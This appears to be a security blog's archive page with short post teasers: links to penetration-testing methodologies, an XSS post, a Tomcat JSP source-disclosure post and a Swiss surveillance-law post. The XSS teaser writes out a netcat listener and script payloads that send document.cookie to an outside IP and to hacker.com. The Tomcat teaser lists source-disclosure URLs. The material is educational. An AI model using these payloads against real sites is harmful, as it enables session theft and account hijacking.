Category Archives: Security

Penetration Testing Methodologies

OWASP (Open Web Application Security Project): http://www.owasp.org/
OSSTMM (Open Source Security Testing Methodology Manual): http://www.osstmm.org
The NIST SP 800-42 at: http://csrc.nist.gov/publications/nistpubs/800-42/NIST-SP800-42.pdf
The CISSP and SSCP Open Study Guides Web Site: http://www.cccure.org
The Professional Security Testers Warehouse: http://www.professionalsecuritytesters.org

Posted in Security | Leave a comment

XSS (Cross Site Scripting)

Listener on evil host:
nc -l -p 80

Example script on attacked server:
<script>alert(document.cookie)</script>

Example 1:
<script>document.write('<img src=http://195.225.45.220/' + document.cookie + '>')</script>

Example 2:
<script>(new Image).src="http://195.225.45.220/c.php?c=" + escape(document.cookie)</script>

Example 3:
<script>(new Image).src='http://www.hacker.com/' … Continue reading


Attacking Apache Tomcat JSP

Try to get the source

Apache Software Foundation Tomcat 3.2.4
Apache Software Foundation Tomcat 3.2.3
http://example.com:80/examples/jsp/source.jsp??
http://example.com:80/examples/jsp/source.jsp?/jsp/
From: http://www.securityfocus.com/bid/4876/exploit

Apache Software Foundation Tomcat 4.X
[SECURITY] Apache Tomcat 4.x JSP source disclosure vulnerability
2. Details
Let's say you have valid URL like … Continue reading


Internet Legislation in Switzerland

Surveillance of Telecommunications Traffic
